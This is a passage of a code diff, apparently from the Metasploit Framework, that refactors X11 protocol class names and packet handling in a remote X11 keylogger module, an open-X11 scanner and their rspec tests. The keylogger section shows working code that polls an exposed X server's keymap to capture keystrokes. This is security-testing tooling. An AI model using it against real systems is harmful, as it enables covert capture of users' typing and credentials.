@@ -168,58 +168,55 @@ def run
else
fail_with(Msf::Module::Failure::UnexpectedReply, 'Failed to establish an X11 connection')
end
- vprint_status("Version: #{connection.protocol_version_major}.#{connection.protocol_version_minor}")
- vprint_status("Screen Resolution: #{connection.screen_width_in_pixels}x#{connection.screen_height_in_pixels}")
- vprint_status("Resource ID: #{connection.resource_id_base.inspect}")
- vprint_status("Screen root: #{connection.screen_root.inspect}")
+ print_connection_info(connection, datastore['RHOST'], datastore['RPORT'])
- vprint_status('(2/9) Checking on BIG-REQUESTS extension')
- sock.put(QUERYEXTENSION.new(extension: 'BIG-REQUESTS', unused2: query_extension_calls).to_binary_s) # check if BIG-REQUESTS exist, not sure why
+ vprint_status('[2/9] Checking on BIG-REQUESTS extension')
+ sock.put(X11QueryExtensionRequest.new(extension: 'BIG-REQUESTS', unused2: query_extension_calls).to_binary_s) # check if BIG-REQUESTS exist, not sure why
query_extension_calls += 1
big_requests_plugin = process_extension_query(sock.get_once(-1, 1), 'BIG-REQUESTS')
- vprint_status('(3/9) Enabling BIG-REQUESTS')
- sock.put(EXTENSIONTOGGLE.new(opcode: big_requests_plugin.major_opcode).to_binary_s) # not sure why we do this
+ vprint_status('[3/9] Enabling BIG-REQUESTS')
+ sock.put(X11ExtensionToggleRequest.new(opcode: big_requests_plugin.major_opcode).to_binary_s) # not sure why we do this
sock.get_once(-1, 1)
- vprint_status('(4/9) Creating new graphical context')
- sock.put(X11CREATEGRAPHICALCONTEXTREQUEST.new(cid: connection.resource_id_base,
+ vprint_status('[4/9] Creating new graphical context')
+ sock.put(X11CreateGraphicalContextRequest.new(cid: connection.resource_id_base,
drawable: connection.screen_root,
gc_value_mask_background: 1).to_binary_s +
- X11GETPROPERTYREQUEST.new(window: connection.screen_root).to_binary_s) # not sure why we do this
+ X11GetPropertyRequest.new(window: connection.screen_root).to_binary_s) # not sure why we do this
sock.get_once(-1, 1)
- vprint_status('(5/9) Checking on XKEYBOARD extension')
- sock.put(QUERYEXTENSION.new(extension: 'XKEYBOARD', unused2: query_extension_calls).to_binary_s) # check if XKEYBOARD exist, not sure why
+ vprint_status('[5/9] Checking on XKEYBOARD extension')
+ sock.put(X11QueryExtensionRequest.new(extension: 'XKEYBOARD', unused2: query_extension_calls).to_binary_s) # check if XKEYBOARD exist, not sure why
xkeyboard_plugin = process_extension_query(sock.get_once(-1, 1), 'XKEYBOARD')
- vprint_status('(6/9) Enabling XKEYBOARD')
- sock.put(EXTENSIONTOGGLE.new(opcode: xkeyboard_plugin.major_opcode, wanted_major: 1).to_binary_s) # use keyboard
+ vprint_status('[6/9] Enabling XKEYBOARD')
+ sock.put(X11ExtensionToggleRequest.new(opcode: xkeyboard_plugin.major_opcode, wanted_major: 1).to_binary_s) # use keyboard
sock.get_once(-1, 1)
- vprint_status('(7/9) Requesting XKEYBOARD map')
- sock.put(GETMAPREQUEST.new(xkeyboard_id: xkeyboard_plugin.major_opcode,
- full_key_types: 1,
- full_key_syms: 1,
- full_modifier_map: 1).to_binary_s) # not sure what this does
- map_data = GETMAPREPLY.read(sock.get_once(-1, 1))
+ vprint_status('[7/9] Requesting XKEYBOARD map')
+ sock.put(X11GetMapRequest.new(xkeyboard_id: xkeyboard_plugin.major_opcode,
+ full_key_types: 1,
+ full_key_syms: 1,
+ full_modifier_map: 1).to_binary_s) # not sure what this does
+ map_data = X11GetMapReply.read(sock.get_once(-1, 1))
- vprint_status('(8/9) Enabling notification on keyboard and map')
- sock.put(SELECTEVENTS.new(xkeyboard_id: xkeyboard_plugin.major_opcode,
- affect_which_new_keyboard_notify: 1,
- affect_new_keyboard_key_codes: 1,
- affect_new_keyboard_device_id: 1).to_binary_s +
- SELECTEVENTS.new(xkeyboard_id: xkeyboard_plugin.major_opcode,
- affect_which_map_notify: 1,
- affect_map_key_types: 1,
- affect_map_key_syms: 1,
- affect_map_modifier_map: 1,
- map_key_types: 1,
- map_key_syms: 1,
- map_modifier_map: 1).to_binary_s) # not sure what this does
+ vprint_status('[8/9] Enabling notification on keyboard and map')
+ sock.put(X11SelectEvents.new(xkeyboard_id: xkeyboard_plugin.major_opcode,
+ affect_which_new_keyboard_notify: 1,
+ affect_new_keyboard_key_codes: 1,
+ affect_new_keyboard_device_id: 1).to_binary_s +
+ X11SelectEvents.new(xkeyboard_id: xkeyboard_plugin.major_opcode,
+ affect_which_map_notify: 1,
+ affect_map_key_types: 1,
+ affect_map_key_syms: 1,
+ affect_map_modifier_map: 1,
+ map_key_types: 1,
+ map_key_syms: 1,
+ map_modifier_map: 1).to_binary_s) # not sure what this does
sock.get_once(-1, 1)
- vprint_status('(9/9) Creating local keyboard map')
+ vprint_status('[9/9] Creating local keyboard map')
key_map = build_sym_key_map(map_data)
last_key_press_array = Array.new(32, 0)
empty = Array.new(32, 0)
@@ -232,8 +229,8 @@ def run
loop do
break if timeout > 0 && (stime + timeout < Time.now.to_f)
- sock.put(QUERYKEYMAPREQUEST.new.to_binary_s)
- bit_array_of_keystrokes = QUERYKEYMAPREPLY.read(sock.get_once(-1, 1)).data
+ sock.put(X11QueryKeyMapRequest.new.to_binary_s)
+ bit_array_of_keystrokes = X11QueryKeyMapReply.read(sock.get_once(-1, 1)).data
# we poll FAR quicker than a normal key press, so we need to filter repeats
next if bit_array_of_keystrokes == last_key_press_array # skip repeats
@@ -242,8 +239,8 @@ def run
end
ensure
vprint_status('Closing X11 connection')
- sock.put(X11FREEGRAPHICALCONTEXTREQUEST.new(gc: connection.resource_id_base).to_binary_s +
- X11GETINPUTFOCUSREQUEST.new.to_binary_s)
+ sock.put(X11FreeGraphicalContextRequest.new(gc: connection.resource_id_base).to_binary_s +
+ X11GetInputFocusRequest.new.to_binary_s)
disconnect
unless @keylogger_log == ''
diff --git a/modules/auxiliary/scanner/x11/open_x11.rb b/modules/auxiliary/scanner/x11/open_x11.rb
index 9466cd5a96c1..c0d3b1be4de4 100644
--- a/modules/auxiliary/scanner/x11/open_x11.rb
+++ b/modules/auxiliary/scanner/x11/open_x11.rb
@@ -42,36 +42,40 @@ def initialize
def run_host(ip)
connect
- sock.put(X11CONNECTIONREQUEST.new.to_binary_s) # x11 session establish
- packet = sock.get_once(-1, 1)
+ sock.put(X11ConnectionRequest.new.to_binary_s) # x11 session establish
+ packet = ''
+ connection = nil
begin
- connection = X11CONNECTION.read(packet)
- rescue EOFError
- vprint_bad("Connection packet malformed (size: #{packet.length}), attempting to get read more data")
- packet += sock.get_once(-1, 1)
- begin
- connection = X11CONNECTION.read(packet)
- if connection.success == 1
- print_good("#{ip} - Successly established X11 connection")
- vprint_status(" Vendor: #{connection.vendor}")
- vprint_status(" Version: #{connection.protocol_version_major}.#{connection.protocol_version_minor}")
- vprint_status(" Screen Resolution: #{connection.screen_width_in_pixels}x#{connection.screen_height_in_pixels}")
- vprint_status(" Resource ID: #{connection.resource_id_base.inspect}")
- vprint_status(" Screen root: #{connection.screen_root.inspect}")
- report_note(
- host: ip,
- proto: 'tcp',
- sname: 'x11',
- port: rport,
- type: 'x11.server_vendor',
- data: "Open X Server (#{connection.vendor})"
- )
- else
- vprint_error("#{ip} Access Denied")
+ loop do
+ new_data = sock.get_once(-1, 1)
+ break if new_data.nil?
+
+ packet += new_data
+ begin
+ connection = X11ConnectionResponse.read(packet)
+ break # Break loop if packet is successfully read
+ rescue EOFError
+ vprint_bad("Connection packet malformed (size: #{packet.length}), attempting to read more data")
+ # Continue looping to try and receive more data
end
- rescue StandardError
- vprint_bad('Failed to parse X11 connection initialization response packet')
end
+ rescue StandardError => e
+ vprint_bad("Error processing data: #{e}")
+ end
+
+ if connection.nil?
+ vprint_bad('No connection, or bad X11 response received')
+ return
+ end
+
+ begin
+ if connection.success == 1
+ print_connection_info(connection, ip, rport)
+ else
+ vprint_error("#{ip} Access Denied")
+ end
+ rescue StandardError
+ vprint_bad('Failed to parse X11 connection initialization response packet')
end
disconnect
diff --git a/spec/lib/msf/core/exploit/remote/x11.rb b/spec/lib/msf/core/exploit/remote/x11.rb
index 88b7afe02861..02ca680111cc 100644
--- a/spec/lib/msf/core/exploit/remote/x11.rb
+++ b/spec/lib/msf/core/exploit/remote/x11.rb
@@ -52,7 +52,7 @@
describe 'handles GetProperty response' do
it do
- response = Msf::Exploit::Remote::X11::X11GETPROPERTYRESPONSE.read(get_property_resp)
+ response = Msf::Exploit::Remote::X11::X11GetPropertyResponse.read(get_property_resp)
expect(response.get_property_type).to eq(31) # \x1f\x00\x00\x00
expect(response.sequence_number).to eq(4) # \x04\x00
expect(response.value_data).to eq("Xft.dpi:\t96\nXft.antialias:\t1\nXft.hinting:\t1\nXft.hintstyle:\thintslight\nXft.rgba:\trgb\nXcursor.size:\t24\nXcursor.theme:\tYaru\n")
@@ -61,9 +61,9 @@
describe 'handles GetProperty request' do
it do
- request = Msf::Exploit::Remote::X11::X11GETPROPERTYREQUEST.new(window: 1320)
+ request = Msf::Exploit::Remote::X11::X11GetPropertyRequest.new(window: 1320)
expect(request.to_binary_s).to eq(get_property)
- request = Msf::Exploit::Remote::X11::X11GETPROPERTYREQUEST.read(get_property)
+ request = Msf::Exploit::Remote::X11::X11GetPropertyRequest.read(get_property)
expect(request.content_length).to eq(100_000_000)
expect(request.window).to eq(1320)
end
@@ -71,14 +71,14 @@
describe 'creates a graphical context request' do
it do
- request = Msf::Exploit::Remote::X11::X11CREATEGRAPHICALCONTEXTREQUEST.read(creategc)
+ request = Msf::Exploit::Remote::X11::X11CreateGraphicalContextRequest.read(creategc)
expect(request.opcode).to eq(55)
expect(request.request_length).to eq(5)
expect(request.cid).to eq(16777216)
expect(request.drawable).to eq(1320)
expect(request.gc_value_mask_background).to eq(1)
expect(request.background).to eq(16777215)
- request = Msf::Exploit::Remote::X11::X11CREATEGRAPHICALCONTEXTREQUEST.new(
+ request = Msf::Exploit::Remote::X11::X11CreateGraphicalContextRequest.new(
cid: 16777216,
drawable: 1320,
gc_value_mask_background: 1
@@ -89,46 +89,44 @@
describe 'handles GetInputFocus request' do
it do
- request = Msf::Exploit::Remote::X11::X11GETINPUTFOCUSREQUEST.new
+ request = Msf::Exploit::Remote::X11::X11GetInputFocusRequest.new
expect(request.to_binary_s).to eq(get_input_focus)
- request = Msf::Exploit::Remote::X11::X11GETINPUTFOCUSREQUEST.read(get_input_focus)
+ request = Msf::Exploit::Remote::X11::X11GetInputFocusRequest.read(get_input_focus)
expect(request.opcode).to eq(43)
end
end
describe 'handles FreeGraphicalContext request' do
it do
- request = Msf::Exploit::Remote::X11::X11FREEGRAPHICALCONTEXTREQUEST.new(
+ request = Msf::Exploit::Remote::X11::X11FreeGraphicalContextRequest.new(
gc: 33554432
)
expect(request.to_binary_s).to eq(free_gc)
- request = Msf::Exploit::Remote::X11::X11FREEGRAPHICALCONTEXTREQUEST.read(free_gc)
+ request = Msf::Exploit::Remote::X11::X11FreeGraphicalContextRequest.read(free_gc)
expect(request.opcode).to eq(60)
expect(request.gc).to eq(33554432)
end
end
-
describe 'creates InternAtom requests' do
it do
- request = Msf::Exploit::Remote::X11::X11INTERNATOMREQUEST.new(
- name: "Wait",
+ request = Msf::Exploit::Remote::X11::X11InternAtomRequest.new(
+ name: 'Wait'
)
expect(request.to_binary_s).to eq(intern_atom_wait)
expect(request.opcode).to eq(16)
expect(request.request_length).to eq(3)
- expect(request.name).to eq("Wait")
+ expect(request.name).to eq('Wait')
expect(request.only_if_exists).to eq(0)
-
- request = Msf::Exploit::Remote::X11::X11INTERNATOMREQUEST.new(
+
+ request = Msf::Exploit::Remote::X11::X11InternAtomRequest.new(
name: "SERVER_OVERLAY_VISUALS\x00\x00", only_if_exists: 1
)
expect(request.to_binary_s).to eq(intern_atom_server_overlay_visuals)
expect(request.opcode).to eq(16)
expect(request.request_length).to eq(8)
- expect(request.name).to eq("SERVER_OVERLAY_VISUALS")
+ expect(request.name).to eq('SERVER_OVERLAY_VISUALS')
expect(request.only_if_exists).to eq(1)
end
end
-
-end
\ No newline at end of file
+end
diff --git a/spec/lib/msf/core/exploit/remote/x11/connect.rb b/spec/lib/msf/core/exploit/remote/x11/connect.rb
index 14b440bbf5aa..d7819837312c 100644
--- a/spec/lib/msf/core/exploit/remote/x11/connect.rb
+++ b/spec/lib/msf/core/exploit/remote/x11/connect.rb
@@ -1221,16 +1221,16 @@
describe 'creates connection request' do
it do
- request = Msf::Exploit::Remote::X11::X11CONNECTIONREQUEST.read(conn_request)
+ request = Msf::Exploit::Remote::X11::X11ConnectionRequest.read(conn_request)
expect(request.to_binary_s).to eq(conn_request)
- request = Msf::Exploit::Remote::X11::X11CONNECTIONREQUEST.new
+ request = Msf::Exploit::Remote::X11::X11ConnectionRequest.new
expect(request.to_binary_s).to eq(conn_request)
end
end
describe 'handles connection response' do
it do
- response = Msf::Exploit::Remote::X11::X11CONNECTION.read(conn_resp)
+ response = Msf::Exploit::Remote::X11::X11ConnectionResponse.read(conn_resp)
expect(response.success).to eq(1)
expect(response.resource_id_base).to eq(16777216)
expect(response.vendor).to eq('The X.Org Foundation')
@@ -1241,7 +1241,7 @@
describe 'handles connection response 2' do
it do
- response = Msf::Exploit::Remote::X11::X11CONNECTION.read(conn_resp2)
+ response = Msf::Exploit::Remote::X11::X11ConnectionResponse.read(conn_resp2)
expect(response.success).to eq(1)
expect(response.resource_id_base).to eq(52428800)
expect(response.vendor).to eq('The X.Org Foundation')
@@ -1249,4 +1249,4 @@
expect(response.screen_height_in_pixels).to eq(832)
end
end
-end
\ No newline at end of file
+end
diff --git a/spec/lib/msf/core/exploit/remote/x11/extensions.rb b/spec/lib/msf/core/exploit/remote/x11/extensions.rb
index cd3abf26f14b..1d14d2a621f2 100644
--- a/spec/lib/msf/core/exploit/remote/x11/extensions.rb
+++ b/spec/lib/msf/core/exploit/remote/x11/extensions.rb
@@ -30,25 +30,25 @@
describe 'creates QueryExtension request for full length plugin' do
it do
- request = Msf::Exploit::Remote::X11::Extensions::QUERYEXTENSION.read(query_extension)
- expect(request.extension).to eq("BIG-REQUESTS")
- request = Msf::Exploit::Remote::X11::Extensions::QUERYEXTENSION.new(extension: 'BIG-REQUESTS')
+ request = Msf::Exploit::Remote::X11::Extensions::X11QueryExtensionRequest.read(query_extension)
+ expect(request.extension).to eq('BIG-REQUESTS')
+ request = Msf::Exploit::Remote::X11::Extensions::X11QueryExtensionRequest.new(extension: 'BIG-REQUESTS')
expect(request.to_binary_s).to eq(query_extension)
end
end
describe 'creates QueryExtension request for short length plugin' do
it do
- request = Msf::Exploit::Remote::X11::Extensions::QUERYEXTENSION.read(query_extension2)
- expect(request.extension).to eq("XKEYBOARD")
- request = Msf::Exploit::Remote::X11::Extensions::QUERYEXTENSION.new(extension: 'XKEYBOARD')
+ request = Msf::Exploit::Remote::X11::Extensions::X11QueryExtensionRequest.read(query_extension2)
+ expect(request.extension).to eq('XKEYBOARD')
+ request = Msf::Exploit::Remote::X11::Extensions::X11QueryExtensionRequest.new(extension: 'XKEYBOARD')
expect(request.to_binary_s).to eq(query_extension2)
end
end
describe 'handles QueryExtension response' do
it do
- response = Msf::Exploit::Remote::X11::Extensions::QUERYEXTENSIONRESPONSE.read(query_extension_resp)
+ response = Msf::Exploit::Remote::X11::Extensions::X11QueryExtensionResponse.read(query_extension_resp)
expect(response.major_opcode).to eq(134)
expect(response.present).to eq(1)
end
@@ -56,13 +56,13 @@
describe 'creates Extension Toggle request' do
it do
- request = Msf::Exploit::Remote::X11::Extensions::EXTENSIONTOGGLE.read(enable_134)
+ request = Msf::Exploit::Remote::X11::Extensions::X11ExtensionToggleRequest.read(enable_134)
expect(request.opcode).to eq(134)
expect(request.wanted_major).to eq(0)
expect(request.wanted_major).to eq(0)
expect(request.request_length).to eq(1)
- request = Msf::Exploit::Remote::X11::Extensions::EXTENSIONTOGGLE.new(opcode: 134)
+ request = Msf::Exploit::Remote::X11::Extensions::X11ExtensionToggleRequest.new(opcode: 134)
expect(request.to_binary_s).to eq(enable_134)
end
end
-end
\ No newline at end of file
+end
diff --git a/spec/lib/msf/core/exploit/remote/x11/window.rb b/spec/lib/msf/core/exploit/remote/x11/window.rb
index bae4c0ead98d..7af95b789eec 100644
--- a/spec/lib/msf/core/exploit/remote/x11/window.rb
+++ b/spec/lib/msf/core/exploit/remote/x11/window.rb
@@ -2569,7 +2569,6 @@
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-
end
let(:getcolors_response) do
@@ -2776,27 +2775,27 @@
describe 'creates GET requests for different functions' do
it do
# test against packet pulled from wireshark
- request = Msf::Exploit::Remote::X11::Window::GETREQUEST.read(get_window_attributes)
+ request = Msf::Exploit::Remote::X11::Window::X11GetRequest.read(get_window_attributes)
expect(request.opcode).to eq(3)
expect(request.request_length).to eq(2)
expect(request.window).to eq(1320)
- request = Msf::Exploit::Remote::X11::Window::GETREQUEST.new(
+ request = Msf::Exploit::Remote::X11::Window::X11GetRequest.new(
window: 1320,
opcode: 3,
- unused: 3
+ pad: 3
)
expect(request.to_binary_s).to eq(get_window_attributes)
- request = Msf::Exploit::Remote::X11::Window::GETREQUEST.read(get_geometry)
+ request = Msf::Exploit::Remote::X11::Window::X11GetRequest.read(get_geometry)
expect(request.opcode).to eq(14)
expect(request.request_length).to eq(2)
expect(request.window).to eq(1320)
- request = Msf::Exploit::Remote::X11::Window::GETREQUEST.new(
+ request = Msf::Exploit::Remote::X11::Window::X11GetRequest.new(
window: 1320,
opcode: 14,
- unused: 4
+ pad: 4
)
expect(request.to_binary_s).to eq(get_geometry)
end
@@ -2805,7 +2804,7 @@
describe 'creates TranslateCoordinates request' do
it do
# test against packet pulled from wireshark
- request = Msf::Exploit::Remote::X11::Window::TRANSLATECOORDINATESREQUEST.read(translate_request)
+ request = Msf::Exploit::Remote::X11::Window::X11TranslateCoordinatesRequest.read(translate_request)
expect(request.opcode).to eq(40)
expect(request.request_length).to eq(4)
expect(request.src_window).to eq(1320)
@@ -2813,11 +2812,11 @@
expect(request.src_x).to eq(0)
expect(request.src_y).to eq(0)
- request = Msf::Exploit::Remote::X11::Window::TRANSLATECOORDINATESREQUEST.new(
+ request = Msf::Exploit::Remote::X11::Window::X11TranslateCoordinatesRequest.new(
src_window: 1320,
dst_window: 1320,
opcode: 40,
- unused: 3
+ pad: 3
)
expect(request.to_binary_s).to eq(translate_request)
end
@@ -2826,11 +2825,11 @@
describe 'creates QueryTree request' do
it do
# test against packet pulled from wireshark
- request = Msf::Exploit::Remote::X11::Window::QUERYTREEREQUEST.read(querytree_request)
+ request = Msf::Exploit::Remote::X11::Window::X11QueryTreeRequest.read(querytree_request)
expect(request.opcode).to eq(15)
expect(request.request_length).to eq(2)
- request = Msf::Exploit::Remote::X11::Window::QUERYTREEREQUEST.new(
+ request = Msf::Exploit::Remote::X11::Window::X11QueryTreeRequest.new(
drawable: 1320
)
expect(request.to_binary_s).to eq(querytree_request)
@@ -2840,7 +2839,7 @@
describe 'handles QueryTree response' do
it do
# test against packet pulled from wireshark
- response = Msf::Exploit::Remote::X11::Window::QUERYTREERESPONSE.read(querytree_response)
+ response = Msf::Exploit::Remote::X11::Window::X11QueryTreeResponse.read(querytree_response)
expect(response.children_len).to eq(72)
expect(response.root_window).to eq(1320)
expect(response.parent_window).to eq(0)
@@ -2851,7 +2850,7 @@
describe 'handles GetWindowAttributes response' do
it do
# test against packet pulled from wireshark
- response = Msf::Exploit::Remote::X11::Window::GETWINDOWATTRIBUTESRESPONSE.read(windowattributes_response)
+ response = Msf::Exploit::Remote::X11::Window::X11GetWindowAttributeResponse.read(windowattributes_response)
expect(response.depth).to eq(1)
expect(response.visual_id).to eq(4352)
expect(response.class_name).to eq(0)
@@ -2863,7 +2862,7 @@
describe 'handles GetGeometry response' do
it do
# test against packet pulled from wireshark
- response = Msf::Exploit::Remote::X11::Window::GETGEOMETRYRESPONSE.read(getgeometry_response)
+ response = Msf::Exploit::Remote::X11::Window::X11GetGeometryResponse.read(getgeometry_response)
expect(response.depth).to eq(1)
expect(response.root).to eq(4608)
expect(response.x).to eq(0)
@@ -2877,7 +2876,7 @@
describe 'creates GetImage request' do
it do
# test against packet pulled from wireshark
- request = Msf::Exploit::Remote::X11::Window::GETIMAGEREQUEST.read(getimage_request)
+ request = Msf::Exploit::Remote::X11::Window::X11GetImageRequest.read(getimage_request)
expect(request.opcode).to eq(73)
expect(request.image_pixmap_format).to eq(2)
expect(request.request_length).to eq(5)
@@ -2888,7 +2887,7 @@
expect(request.height).to eq(21)
expect(request.plane_mask).to eq(4294967295)
- request = Msf::Exploit::Remote::X11::Window::GETIMAGEREQUEST.new(
+ request = Msf::Exploit::Remote::X11::Window::X11GetImageRequest.new(
x: 0, y: 0,
width: 954, height: 21,
drawable: 41943043
@@ -2900,11 +2899,11 @@
describe 'handles GetImage response' do
it do
# test against packet pulled from wireshark
- response = Msf::Exploit::Remote::X11::Window::GETIMAGERESPONSE.read(getimage_response)
+ response = Msf::Exploit::Remote::X11::Window::X11GetImageResponse.read(getimage_response)
expect(response.response_type).to eq(1)
expect(response.depth).to eq(32)
expect(response.sequence_number).to eq(171)
- expect(response.reply_length).to eq(10_000)
+ expect(response.response_length).to eq(10_000)
expect(response.visual_id).to eq(1291)
expect(response.image_data.length).to eq(10_000)
end
@@ -2913,17 +2912,16 @@
describe 'creates GetColors request' do
it do
# test against packet pulled from wireshark
- request = Msf::Exploit::Remote::X11::Window::GETCOLORSREQUEST.read(getcolors_request)
+ request = Msf::Exploit::Remote::X11::Window::X11GetColorsRequest.read(getcolors_request)
expect(request.opcode).to eq(91)
expect(request.color_map).to eq(41943042)
expect(request.request_length).to eq(258)
expect(request.pixels).to eq([0, 65793, 131586, 197379, 263172, 328965, 394758, 460551, 526344, 592137, 657930, 723723, 789516, 855309, 921102, 986895, 1052688, 1118481, 1184274, 1250067, 1315860, 1381653, 1447446, 1513239, 1579032, 1644825, 1710618, 1776411, 1842204, 1907997, 1973790, 2039583, 2105376, 2171169, 2236962, 2302755, 2368548, 2434341, 2500134, 2565927, 2631720, 2697513, 2763306, 2829099, 2894892, 2960685, 3026478, 3092271, 3158064, 3223857, 3289650, 3355443, 3421236, 3487029, 3552822, 3618615, 3684408, 3750201, 3815994, 3881787, 3947580, 4013373, 4079166, 4144959, 4210752, 4276545, 4342338, 4408131, 4473924, 4539717, 4605510, 4671303, 4737096, 4802889, 4868682, 4934475, 5000268, 5066061, 5131854, 5197647, 5263440, 5329233, 5395026, 5460819, 5526612, 5592405, 5658198, 5723991, 5789784, 5855577, 5921370, 5987163, 6052956, 6118749, 6184542, 6250335, 6316128, 6381921, 6447714, 6513507, 6579300, 6645093, 6710886, 6776679, 6842472, 6908265, 6974058, 7039851, 7105644, 7171437, 7237230, 7303023, 7368816, 7434609, 7500402, 7566195, 7631988, 7697781, 7763574, 7829367, 7895160, 7960953, 8026746, 8092539, 8158332, 8224125, 8289918, 8355711, 8421504, 8487297, 8553090, 8618883, 8684676, 8750469, 8816262, 8882055, 8947848, 9013641, 9079434, 9145227, 9211020, 9276813, 9342606, 9408399, 9474192, 9539985, 9605778, 9671571, 9737364, 9803157, 9868950, 9934743, 10000536, 10066329, 10132122, 10197915, 10263708, 10329501, 10395294, 10461087, 10526880, 10592673, 10658466, 10724259, 10790052, 10855845, 10921638, 10987431, 11053224, 11119017, 11184810, 11250603, 11316396, 11382189, 11447982, 11513775, 11579568, 11645361, 11711154, 11776947, 11842740, 11908533, 11974326, 12040119, 12105912, 12171705, 12237498, 12303291, 12369084, 12434877, 12500670, 12566463, 12632256, 12698049, 12763842, 12829635, 12895428, 12961221, 13027014, 13092807, 13158600, 13224393, 13290186, 13355979, 13421772, 13487565, 13553358, 13619151, 13684944, 13750737, 13816530, 13882323, 13948116, 14013909, 14079702, 14145495, 14211288, 14277081, 14342874, 14408667, 14474460, 14540253, 14606046, 14671839, 14737632, 14803425, 14869218, 14935011, 15000804, 15066597, 15132390, 15198183, 15263976, 15329769, 15395562, 15461355, 15527148, 15592941, 15658734, 15724527, 15790320, 15856113, 15921906, 15987699, 16053492, 16119285, 16185078, 16250871, 16316664, 16382457, 16448250, 16514043, 16579836, 16645629, 16711422, 16777215])
-
- request = Msf::Exploit::Remote::X11::Window::GETCOLORSREQUEST.new(
+ request = Msf::Exploit::Remote::X11::Window::X11GetColorsRequest.new(
color_map: 41943042,
pixels: [0, 65793, 131586, 197379, 263172, 328965, 394758, 460551, 526344, 592137, 657930, 723723, 789516, 855309, 921102, 986895, 1052688, 1118481, 1184274, 1250067, 1315860, 1381653, 1447446, 1513239, 1579032, 1644825, 1710618, 1776411, 1842204, 1907997, 1973790, 2039583, 2105376, 2171169, 2236962, 2302755, 2368548, 2434341, 2500134, 2565927, 2631720, 2697513, 2763306, 2829099, 2894892, 2960685, 3026478, 3092271, 3158064, 3223857, 3289650, 3355443, 3421236, 3487029, 3552822, 3618615, 3684408, 3750201, 3815994, 3881787, 3947580, 4013373, 4079166, 4144959, 4210752, 4276545, 4342338, 4408131, 4473924, 4539717, 4605510, 4671303, 4737096, 4802889, 4868682, 4934475, 5000268, 5066061, 5131854, 5197647, 5263440, 5329233, 5395026, 5460819, 5526612, 5592405, 5658198, 5723991, 5789784, 5855577, 5921370, 5987163, 6052956, 6118749, 6184542, 6250335, 6316128, 6381921, 6447714, 6513507, 6579300, 6645093, 6710886, 6776679, 6842472, 6908265, 6974058, 7039851, 7105644, 7171437, 7237230, 7303023, 7368816, 7434609, 7500402, 7566195, 7631988, 7697781, 7763574, 7829367, 7895160, 7960953, 8026746, 8092539, 8158332, 8224125, 8289918, 8355711, 8421504, 8487297, 8553090, 8618883, 8684676, 8750469, 8816262, 8882055, 8947848, 9013641, 9079434, 9145227, 9211020, 9276813, 9342606, 9408399, 9474192, 9539985, 9605778, 9671571, 9737364, 9803157, 9868950, 9934743, 10000536, 10066329, 10132122, 10197915, 10263708, 10329501, 10395294, 10461087, 10526880, 10592673, 10658466, 10724259, 10790052, 10855845, 10921638, 10987431, 11053224, 11119017, 11184810, 11250603, 11316396, 11382189, 11447982, 11513775, 11579568, 11645361, 11711154, 11776947, 11842740, 11908533, 11974326, 12040119, 12105912, 12171705, 12237498, 12303291, 12369084, 12434877, 12500670, 12566463, 12632256, 12698049, 12763842, 12829635, 12895428, 12961221, 13027014, 13092807, 13158600, 13224393, 13290186, 13355979, 13421772, 13487565, 13553358, 13619151, 13684944, 13750737, 13816530, 13882323, 13948116, 14013909, 14079702, 14145495, 14211288, 14277081, 14342874, 14408667, 14474460, 14540253, 14606046, 14671839, 14737632, 14803425, 14869218, 14935011, 15000804, 15066597, 15132390, 15198183, 15263976, 15329769, 15395562, 15461355, 15527148, 15592941, 15658734, 15724527, 15790320, 15856113, 15921906, 15987699, 16053492, 16119285, 16185078, 16250871, 16316664, 16382457, 16448250, 16514043, 16579836, 16645629, 16711422, 16777215],
- unused: 2
+ pad0: 2
)
expect(request.to_binary_s).to eq(getcolors_request)
end
@@ -2932,13 +2930,12 @@
describe 'handles GetColors response' do
it do
# test against packet pulled from wireshark
- response = Msf::Exploit::Remote::X11::Window::GETCOLORSRESPONSE.read(getcolors_response)
+ response = Msf::Exploit::Remote::X11::Window::X11GetColorsResponse.read(getcolors_response)
expect(response.response_type).to eq(1)
expect(response.sequence).to eq(163)
- expect(response.reply_length).to eq(512)
+ expect(response.response_length).to eq(512)
expect(response.colors_len).to eq(256)
expect(response.colors.length).to eq(256)
end
end
-
end
diff --git a/spec/lib/msf/core/exploit/remote/x11/xkeyboard.rb b/spec/lib/msf/core/exploit/remote/x11/xkeyboard.rb
index 171893ea9e98..5fd180764fb3 100644
--- a/spec/lib/msf/core/exploit/remote/x11/xkeyboard.rb
+++ b/spec/lib/msf/core/exploit/remote/x11/xkeyboard.rb
@@ -383,10 +383,9 @@
"\x00\x00\x00\x00\x2e\x03\x00\x00\x00\x00\x00\x00"
end
-
describe 'handles xkeyboard GetMap response' do
it do
- response = Msf::Exploit::Remote::X11::Xkeyboard::GETMAPREPLY.read(get_keyboardmap_resp)
+ response = Msf::Exploit::Remote::X11::Xkeyboard::X11GetMapReply.read(get_keyboardmap_resp)
expect(response.min_key_code).to eq(8)
expect(response.max_key_code).to eq(255)
@@ -414,20 +413,22 @@
describe 'handles QueryKeymap response' do
it do
- response = Msf::Exploit::Remote::X11::Xkeyboard::QUERYKEYMAPREPLY.read(get_querykeymap_resp)
+ response = Msf::Exploit::Remote::X11::Xkeyboard::X11QueryKeyMapReply.read(get_querykeymap_resp)
expect(response.reply).to eq(1)
expect(response.sequence_number).to eq(9487)
- expect(response.reply_length).to eq(2)
- expect(response.data).to eq([0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\
- 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0])
+ expect(response.response_length).to eq(2)
+ expect(response.data).to eq([
+ 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\
+ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
+ ])
end
end
describe 'creates QueryKeymap request' do
it do
- request = Msf::Exploit::Remote::X11::Xkeyboard::QUERYKEYMAPREQUEST.new()
+ request = Msf::Exploit::Remote::X11::Xkeyboard::X11QueryKeyMapRequest.new
expect(request.to_binary_s).to eq(key_map_request)
- request = Msf::Exploit::Remote::X11::Xkeyboard::QUERYKEYMAPREQUEST.read(key_map_request)
